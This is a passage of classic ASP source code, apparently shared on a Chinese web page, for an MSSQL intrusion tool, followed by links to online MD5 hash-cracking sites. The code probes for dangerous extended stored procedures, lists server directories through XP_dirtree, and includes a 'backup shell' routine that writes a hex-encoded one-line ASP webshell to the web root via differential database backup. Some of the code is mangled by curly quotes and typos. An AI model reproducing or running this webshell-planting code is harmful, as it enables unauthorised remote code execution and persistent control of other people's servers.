Echo “<td> “&xp_cmdshell&” “&sp_oacreate&” “&xp_regwrite&” “&xp_servicecontrol&” “&sp_oamethod&”<br> “&xp_regread&” “&XP_dirtree&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 操作检测</td>”
Echo “<td> “&cbase&” “&create&” “&drop&” “&xp&”</td>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’115′> 列目录</td>”
Echo “<form method=post name=form2 action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=path size=70 value=’c:’> <INPUT TYPE=submit value=查询></from></td>”
Echo “</form>”
Echo “</tr>”
Echo “</table>”
Echo “</td>”
Echo “</tr>”
Echo “</table>”
Echo “<p>”
Echo “<center>”?right&”</center>”
End If
End If ‘tools功能结束%>

<%
If request(“action”)=”dir” Then
If session(“login”)=”yes” Then

On Error Resume Next
rem—————————-数据库连接—————–
ConnStr = “Provider=Sqloledb.1;User ID=” &session(“user”)& “; Password=” &session(“pass”)& “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & session(“ip”) & “,”&session(“port”)&”;”
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
Set Cat = Server.CreateObject(“ADOX.Catalog”)
Cat.ActiveConnection = conn.ConnectionString
rem————————函数————-
rem——————–操作检测——————-

On Error Resume Next
bak_path=Replace(Request(“bak”),”\”,”")
dir_path=Replace(Request(“path”),”\”,”")
If bak_path<>”" Then
dir_path=Replace(bak_path,”bin.asp”,”")
Set Rs = Conn.Execute(“create table [bin_cmd] ([cmd] [image])”)
Set Rs = Conn.Execute(“declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X620069006E00 backup database @a to disk = @s;”)
Set Rs = Conn.Execute(“insert into [bin_cmd](cmd) values(0×3C25657865637574652872657175657374282242222929253E);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’”&bak_path&”‘ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT”)
Set Rs = Conn.Execute(“drop table [bin_cmd]“)
end if
Set Rs = Conn.Execute(“USE pubs”)
If Err Then
cbase=”无法切换到PUBS数据库！”
Else
cbase=”切换到PUBS数据库！”
End If
Set rs = Conn.execute(“drop table [bin_dir]“)
If Err Then
drop=”删除表失败！”
Else
drop=”删除表成功！”
End If
Set rs = Conn.execute(“Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree ‘”&dir_path&”‘,1,1″)
If Err Then
create=”建表失败！”
Else
create=”建表成功！”
End If
Set rs = Conn.execute(“select conunt(*) from bin_dir”)
If rs(0)>1 Then
xp=”扩展执行成功！　<FONT COLOR=RED><STRONG>GOOD LUCK！</STRONG></FONT>”
Else
xp=”扩展执行失败！　SOORY!”
End If
rem——————
Echo “<table style=’TABLE-LAYOUT: fixed; WORD-BREAK: break-all’>”
Echo “<tr>”
Echo”<td width=20% valign=top>”
For Each objTable In Cat.Tables
Echo “<span class=fixSpan title=’” & objTable.Name & “‘ ”
Echo “style=’width:90%;padding-left:8px;cursor:hand;’>” & objTable.Name & “</span>”
Next
Echo “</td>”
Echo “<td valign=top>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’103′> 操作检测</td>”
Echo “<td width=’700′> “&cbase&” “&create&” “&drop&” “&xp&”</td>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’115′> 备份SHELL</td>”
Echo “<form method=post name=formt action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=bak size=70 value=’”&dir_path&”bin.asp’> <INPUT TYPE=submit value=备份></td></form>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’121′> 列目录</td>”
Echo “<form method=post name=form2 action=’?action=dir’>”
Echo “<td width=’700′> <INPUT TYPE=text NAME=path size=70 value=’”&dir_path&”‘> <INPUT TYPE=submit value=查询><input type = button value=退出 onclick= location.href(‘?action=logout’)></td></form>”
Echo “</tr>”
Echo “</table>”
Echo “<table>”

showdata()

Echo “</table>”
Echo “</td>”
Echo “</tr>”
Echo “</table>”
Echo “<p>”
Echo “<center>”?right&”</center>”
End If
End If
%>
<% If Request(“action”)=”logout” Then
Session(“login”) = “”
Response.Redirect”?action=login”
end if
%>

收藏、分享这篇文章!

http://www.hashchecker.com/?_sls=search_hash

http://md5.rednoize.com/

最后一个比较特殊它是在线暴露破解的http://www.milw0rm.com/md5/info.php

收藏、分享这篇文章!